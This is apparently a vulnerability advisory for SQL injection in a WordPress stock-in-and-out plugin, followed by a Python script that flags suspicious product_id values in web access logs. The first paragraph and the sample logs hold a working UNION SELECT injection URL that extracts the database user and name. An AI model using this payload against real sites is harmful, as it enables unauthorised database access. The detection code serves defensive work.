The plugin lacks proper sanitization before passing variables to an SQL request, making it vulnerable to SQL Injection attacks. Users with a role of contributor or higher can exploit this vulnerability.
https://www.example.com/wp-admin/admin.php?page=stock_in&product_id=0+union+select+1%2C2%2C3%2Cuser()%2Cdatabase()%2C6%2C7%2C8%2C9%2C10&tab=history
github.com/pang0lin/CVEproject/blob/main/wordpress_Stock-in-and-out_sqli.md
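
For detection, the following added example (not code from the plugin or from the referenced write-up) scans web access logs for requests to the stock_in page whose product_id is anything other than a plain integer. The log lines are constructed samples, and the function name and log format (combined log format) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=stock_in&product_id=42&tab=history HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=stock_in&product_id=0+union+select+1%2C2%2C3%2Cuser()%2Cdatabase()%2C6%2C7%2C8%2C9%2C10&tab=history HTTP/1.1" 200 5340
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=other&product_id=abc HTTP/1.1" 200 900
203.0.113.8 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-admin/admin.php?page=stock_in&tab=history HTTP/1.1" 200 4800
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A legitimate product_id is assumed to be ASCII digits only.
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client_ip, decoded product_id) for stock_in requests whose
    product_id is anything other than a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs URL-decodes values ('+' becomes a space, %2C a comma).
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page") != ["stock_in"]:
            continue
        for value in params.get("product_id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: non-integer product_id {value!r}")
```

Access logs normally record only the query string, so a product_id submitted in a POST body would not be seen by this check.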